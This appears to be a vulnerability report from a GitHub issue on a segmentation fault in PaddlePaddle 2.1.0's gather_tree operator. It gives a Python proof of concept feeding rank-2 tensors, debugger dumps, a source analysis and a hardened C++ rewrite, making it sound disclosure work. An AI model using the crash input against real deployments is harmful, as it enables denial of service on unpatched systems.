Paddle operator gather_tree has a security issue / bug

bd1hkmkf, posted on 2022-09-21 in Java
Title: the gather_tree operator has a security issue / bug
Version and environment information:
   1) PaddlePaddle version: 2.1.0
   2) CPU/GPU: CPU
   3) System environment: ubuntu 20.04
   4) Python version: 3.8.5

PoC:

import paddle
import paddle.fluid as fluid
import numpy as np

# Constructed rank-2 inputs. gather_tree expects rank-3 tensors of shape
# [max_length, batch_size, beam_size]; the kernel does not check the rank.
ids = paddle.to_tensor([[2, 2], [6, 1]])
parents = paddle.to_tensor([[2, 2], [6, 1]])
out = paddle.nn.functional.gather_tree(ids, parents)  # segfaults on 2.1.0

Crash information

--------------------------------------
C++ Traceback (most recent call last):
--------------------------------------
0   paddle::imperative::Tracer::TraceOp(std::string const&, paddle::imperative::NameVarBaseMap const&, paddle::imperative::NameVarBaseMap const&, paddle::framework::AttributeMap, std::map<std::string, std::string, std::less<std::string >, std::allocator<std::pair<std::string const, std::string > > > const&)
1   paddle::imperative::Tracer::TraceOp(std::string const&, paddle::imperative::NameVarBaseMap const&, paddle::imperative::NameVarBaseMap const&, paddle::framework::AttributeMap, paddle::platform::Place const&, bool, std::map<std::string, std::string, std::less<std::string >, std::allocator<std::pair<std::string const, std::string > > > const&)
2   paddle::imperative::PreparedOp::Run(paddle::imperative::NameVarBaseMap const&, paddle::imperative::NameVarBaseMap const&, paddle::framework::AttributeMap const&)
3   std::_Function_handler<void (paddle::framework::ExecutionContext const&), paddle::framework::OpKernelRegistrarFunctor<paddle::platform::CPUPlace, false, 1ul, paddle::operators::GatherTreeOpKernel<int>, paddle::operators::GatherTreeOpKernel<long> >::operator()(char const*, char const*, int) const::{lambda(paddle::framework::ExecutionContext const&)#1}>::_M_invoke(std::_Any_data const&, paddle::framework::ExecutionContext const&)
4   paddle::framework::SignalHandle(char const*, int)
5   paddle::platform::GetCurrentTraceBackString[abi:cxx11]()

----------------------
Error Message Summary:
----------------------
FatalError: `Segmentation fault` is detected by the operating system.
  [TimeInfo:***Aborted at 1623049987 (unix time) try "date -d @1623049987" if you are using GNU date***]
  [SignalInfo:***SIGSEGV (@0x7ff184021000) received by PID 4597 (TID 0x7ff197dad740) from PID 18446744071629312000***]

Segmentation fault (core dumped)

Analysis:

Partial source code: (https://github.com/PaddlePaddle/Paddle/blob/v2.1.0/paddle/fluid/operators/gather_tree_op.h#L45)

auto &ids_dims = ids->dims();
auto max_length = ids_dims[0];
auto batch_size = ids_dims[1];
auto beam_size = ids_dims[2];         //[1] read without checking that rank == 3

for (int batch = 0; batch < batch_size; batch++) {
    for (int beam = 0; beam < beam_size; beam++) {
        auto idx = (max_length - 1) * batch_size * beam_size +
                   batch * beam_size + beam;      //[2] idx derived from the unchecked beam_size
        out_data[idx] = ids_data[idx];             //[3] unbounded read/write
        // ... remainder of the kernel loop omitted
    }
}

The rank of ids is not checked. When the shape of ids is set improperly (rank less than 3, e.g. 2), this leads to:
Problem 1: at [1], uninitialized memory is read;
Problem 2: when the value in that memory is large, beam_size becomes huge, so the idx computed at [2] becomes huge and the access at [3] goes out of bounds, crashing the program. Some variable values at the crash site are as follows:

(gdb) i locals
idx = 0x11ee400000110
ids_dims = @0x1f72ec8: {
  static kMaxRank = 0x9,
  ids_dims = @0x1e48f78: {
  static kMaxRank = 0x9,
  dim_ = {
    <paddle::framework::Array<long, 9>> = {
      static kSize = <optimized out>,
      data_ = {0x2, 0x2, 0x8f7200000088, 0x9272000000907200, 0x9f72000000, 0x33720000003372, 0x7200000033720000, 0x6d3c08da00000034, 0x1e3e656c75646f}
    },
  },
  rank_ = 0x2
}
beam_size = 0x8f7200000088

Debug information:

[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x9771e7306e8c0
$rbx   : 0x00007fffffffd3e8  →  0x00007ffea33247aa  →  "gather_tree"
$rcx   : 0x8f72000000880
$rdx   : 0x9771e730708c0
$rsp   : 0x00007fffffffcee0  →  0x00007fffffffd090  →  0x00007ffea5feed70  →  0x00007ffea23853d0  →  <paddle::imperative::DygraphExecutionContext<paddle::imperative::VarBase>::~DygraphExecutionContext()+0> endbr64
$rbp   : 0x00007fffffffcfa0  →  0x00007fffffffcfe0  →  0x00007fffffffd010  →  0x00007fffffffd040  →  0x00007fffffffd210  →  0x00007fffffffd250  →  0x00007fffffffd440  →  0x00007fffffffd480
$rsi   : 0x2
$rdi   : 0x0000000001e48f78  →  0x0000000000000002
$rip   : 0x00007ffe9fc8afe7  →  <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov rax, QWORD PTR [rax]
$r8    : 0x1
$r9    : 0x0
$r10   : 0xc70f6907
$r11   : 0x00007ffff7fbabe0  →  0x0000000001f9ba50  →  0x00007ffff79cbb70  →  0x0000000000000012
$r12   : 0x0
$r13   : 0x00007fffffffd980  →  0x00007fffffffd990  →  "gather_tree"
$r14   : 0x2
$r15   : 0x0
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcee0│+0x0000: 0x00007fffffffd090  →  0x00007ffea5feed70  →  0x00007ffea23853d0  →  <paddle::imperative::DygraphExecutionContext<paddle::imperative::VarBase>::~DygraphExecutionContext()+0> endbr64          ← $rsp
0x00007fffffffcee8│+0x0008: 0x00007fffffffcfc0  →  0x00007ffea5fb1d10  →  0x00007ffe9fc8ad4c  →  <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> endbr64
0x00007fffffffcef0│+0x0010: 0x00000000ffffcf20
0x00007fffffffcef8│+0x0018: 0x00007ffe00000000
0x00007fffffffcf00│+0x0020: 0x0000000000000000
0x00007fffffffcf08│+0x0028: 0x0000000001e48f58  →  0x4c055a5f00000000
0x00007fffffffcf10│+0x0030: 0x0000000001e3d838  →  0x7369206500000000
0x00007fffffffcf18│+0x0038: 0x0000000001d07548  →  0x0000000000000000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffe9fc8afd8 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> lea    rcx, [rdx*8+0x0]
   0x7ffe9fc8afe0 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rdx, QWORD PTR [rbp-0x70]
   0x7ffe9fc8afe4 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> add    rdx, rcx
 → 0x7ffe9fc8afe7 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rax, QWORD PTR [rax]
   0x7ffe9fc8afea <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    QWORD PTR [rdx], rax
   0x7ffe9fc8afed <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rax, QWORD PTR [rbp-0x48]
   0x7ffe9fc8aff1 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> lea    rdx, [rax*8+0x0]
   0x7ffe9fc8aff9 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rax, QWORD PTR [rbp-0x78]
   0x7ffe9fc8affd <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> add    rax, rdx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "python", stopped 0x7ffe9fc8afe7 in paddle::operators::GatherTreeOpKernel<long>::Compute (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffe9fc8afe7 → paddle::operators::GatherTreeOpKernel<long>::Compute(this=0x7fffffffcfc0, ctx=@0x7fffffffd090)
[#1] 0x7ffe9fc8a173 → paddle::framework::OpKernelRegistrarFunctor<paddle::platform::CPUPlace, false, 1ul, paddle::operators::GatherTreeOpKernel<int>, paddle::operators::GatherTreeOpKernel<long> >::operator()(char const*, char const*, int) const::{lambda(paddle::framework::ExecutionContext const&)#1}::operator()(paddle::framework::ExecutionContext const&) const(this=0x7fffffffd3e8, ctx=@0x7fffffffd090)
[#2] 0x7ffe9fc8c047 → std::_Function_handler<void (paddle::framework::ExecutionContext const&), paddle::framework::OpKernelRegistrarFunctor<paddle::platform::CPUPlace, false, 1ul, paddle::operators::GatherTreeOpKernel<int>, paddle::operators::GatherTreeOpKernel<long> >::operator()(char const*, char const*, int) const::{lambda(paddle::framework::ExecutionContext const&)#1}>::_M_invoke(std::_Any_data const&, paddle::framework::ExecutionContext const&)(__functor=@0x7fffffffd3e8, __args#0=@0x7fffffffd090)
[#3] 0x7ffea2386ee3 → std::function<void (paddle::framework::ExecutionContext const&)>::operator()(paddle::framework::ExecutionContext const&) const(this=0x7fffffffd3e8, __args#0=@0x7fffffffd090)
(gdb) x/10x $rax
0x9771e7306e8c0:        Cannot access memory at address 0x9771e7306e8c0
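The kernel above takes beam_size from ids_dims[2] before confirming the tensor has three dimensions. The following added example (hypothetical code, not Paddle's, assuming a simple row-major Tensor struct) shows the same indexing with the rank and shape validation a hardened kernel would perform; the parent range check in the inner loop is an extra defensive check, not something the report discusses.

```cpp
#include <cstdint>
#include <stdexcept>
#include <vector>

// Hypothetical row-major tensor: dims = [max_length, batch_size, beam_size].
struct Tensor { std::vector<int64_t> dims; std::vector<int64_t> data; };

// The check missing from the v2.1.0 kernel: both inputs must be rank 3,
// equal in shape, with positive extents matching the backing buffer.
bool validate_gather_tree_inputs(const Tensor& ids, const Tensor& parents) {
  if (ids.dims.size() != 3 || parents.dims.size() != 3) return false;
  if (ids.dims != parents.dims) return false;
  int64_t n = 1;
  for (int64_t d : ids.dims) { if (d <= 0) return false; n *= d; }
  return ids.data.size() == (size_t)n && parents.data.size() == (size_t)n;
}

// Same index arithmetic as the snippet in the report, but only reached
// after validation, so beam_size can never come from uninitialized memory.
std::vector<int64_t> gather_tree(const Tensor& ids, const Tensor& parents) {
  if (!validate_gather_tree_inputs(ids, parents))
    throw std::invalid_argument("gather_tree: ids/parents must be rank-3 and equal shape");
  const int64_t max_length = ids.dims[0], batch_size = ids.dims[1], beam_size = ids.dims[2];
  std::vector<int64_t> out(ids.data.size(), 0);
  for (int64_t batch = 0; batch < batch_size; ++batch) {
    for (int64_t beam = 0; beam < beam_size; ++beam) {
      int64_t idx = (max_length - 1) * batch_size * beam_size + batch * beam_size + beam;
      out[idx] = ids.data[idx];
      int64_t parent = parents.data[idx];
      for (int64_t step = max_length - 2; step >= 0; --step) {
        if (parent < 0 || parent >= beam_size)  // defensive, added here
          throw std::out_of_range("gather_tree: parent index outside beam range");
        idx = step * batch_size * beam_size + batch * beam_size;
        out[idx + beam] = ids.data[idx + parent];
        parent = parents.data[idx + parent];
      }
    }
  }
  return out;
}

// Constructed inputs: the rank-2 shape from the PoC, and a valid rank-3 pair.
Tensor poc_ids() { return Tensor{{2, 2}, {2, 2, 6, 1}}; }
Tensor sample_ids() { return Tensor{{2, 1, 2}, {10, 11, 20, 21}}; }
Tensor sample_parents() { return Tensor{{2, 1, 2}, {0, 0, 1, 0}}; }
```

With the sample pair, beam 0 at the last step has parent 1, so its path backtracks to id 11, while beam 1 backtracks to id 10; the rank-2 PoC shape is rejected before any indexing happens.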
nnsrf1az #1


Hi! We've received your issue; please be patient while we respond. We will arrange technicians to answer your questions as soon as possible. Please make sure that you have posted enough information to demonstrate your request. You may also check out the API docs, FAQ, GitHub Issues and AI community to get the answer. Have a nice day!
